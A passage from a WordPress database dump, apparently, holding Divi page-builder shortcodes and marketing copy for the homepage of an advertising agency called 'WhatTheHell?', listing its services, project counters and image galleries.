INSERT INTO `wp_posts` VALUES (342,1,'2020-07-18 21:04:02','2020-07-18 21:04:02','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" hover_enabled=\"0\" make_fullwidth=\"on\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Best Agency to choose\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"0px||||false|false\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" 